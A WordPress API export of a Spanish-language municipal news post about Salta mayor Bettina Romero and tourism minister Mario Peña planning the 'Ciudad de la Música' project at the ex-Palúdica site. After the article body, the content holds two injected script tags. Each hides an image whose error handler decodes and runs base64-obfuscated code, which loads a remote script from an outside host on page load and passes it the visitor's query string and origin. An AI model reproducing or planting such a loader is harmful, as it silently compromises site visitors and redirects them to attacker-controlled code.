{"id":2410,"date":"2023-03-27T16:43:38","date_gmt":"2023-03-27T19:43:38","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2410"},"modified":"2025-08-14T00:20:28","modified_gmt":"2025-08-14T03:20:28","slug":"bettina-romero-con-mucho-esfuerzo-estamos-transformando-a-salta-en-la-ciudad-que-todos-sonamos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2410","title":{"rendered":"Bettina Romero: \u201cCon mucho esfuerzo estamos transformando a Salta en la ciudad que todos so\u00f1amos\u201d"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#700647\"><strong><em>La Intendenta se reuni\u00f3 con el ministro de Turismo y Deportes para avanzar en el trabajo conjunto referido a las obras de puesta en valor y el nuevo espacio \u201cCiudad de la M\u00fasica\u201d en el predio de la ex Pal\u00fadica, que comenzar\u00e1n en los pr\u00f3ximos d\u00edas. La ciudad de la m\u00fasica ser\u00e1 un espacio de encuentro para todos los artistas de Salta.<\/em><\/strong><\/h4>\n\n\n\n<p>La intendenta, Bettina Romero, se reuni\u00f3 con el ministro de Turismo y Deportes de la provincia, Mario Pe\u00f1a, para ultimar detalles sobre las obras de puesta en valor del nuevo espacio \u201cCiudad de la M\u00fasica\u201d en el predio de la ex Pal\u00fadica, que comenzar\u00e1n a desarrollarse en los pr\u00f3ximos d\u00edas.<\/p>\n\n\n\n<p>\u201cEn pocos d\u00edas comenzar\u00e1n las obras de puesta en valor y el nuevo espacio \u201cCiudad de la M\u00fasica\u201d en el predio de la ex Pal\u00fadica. Este proyecto comenz\u00f3 cuando el gobernador Gustavo S\u00e1enz era Intendente\u201d, record\u00f3 la mandataria y afirm\u00f3: \u201cHoy ya es una realidad, un nuevo espacio que respetando el proyecto original ser\u00e1 un lugar de encuentro y desarrollo para todo el ambiente cultural de Salta\u201d.<\/p>\n\n\n\n<p>Y agreg\u00f3: \u201cCelebro el trabajo en equipo junto al ministro de Turismo, Mario Pe\u00f1a y equipo, para potenciar el crecimiento cultural y tur\u00edstico de la ciudad\u201d.<\/p>\n\n\n\n<p>Cabe recordar, que la Municipalidad viene trabajando en relevamientos previos y la preparaci\u00f3n de los espacios para avanzar con las obras. Se realizar\u00e1n en el marco de la Ley 27.336 que estableci\u00f3 el traspaso del edificio al municipio de Salta, durante la gesti\u00f3n del actual gobernador S\u00e1enz.<\/p>\n\n\n\n<p>El espacio p\u00fablico para la \u201cCiudad de la M\u00fasica\u201d est\u00e1 emplazado entre las calles: General G\u00fcemes (norte), Vicente L\u00f3pez (oeste), Pje. Zorrilla (sur) y Juramento (este) de la ciudad de Salta.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2023\/03\/reunion-x-ciudad-de-la-musica-2.jpeg\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Intendenta se reuni\u00f3 con el ministro de Turismo y Deportes para avanzar en el trabajo conjunto referido a las obras de puesta en valor y el nuevo espacio \u201cCiudad de la M\u00fasica\u201d en el predio de la ex Pal\u00fadica, que comenzar\u00e1n en los pr\u00f3ximos d\u00edas. La ciudad de la m\u00fasica ser\u00e1 un espacio de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2411,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-2410","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2410"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2410"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2410\/revisions"}],"predecessor-version":[{"id":7135,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2410\/revisions\/7135"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2411"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2410"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2410"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2410"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}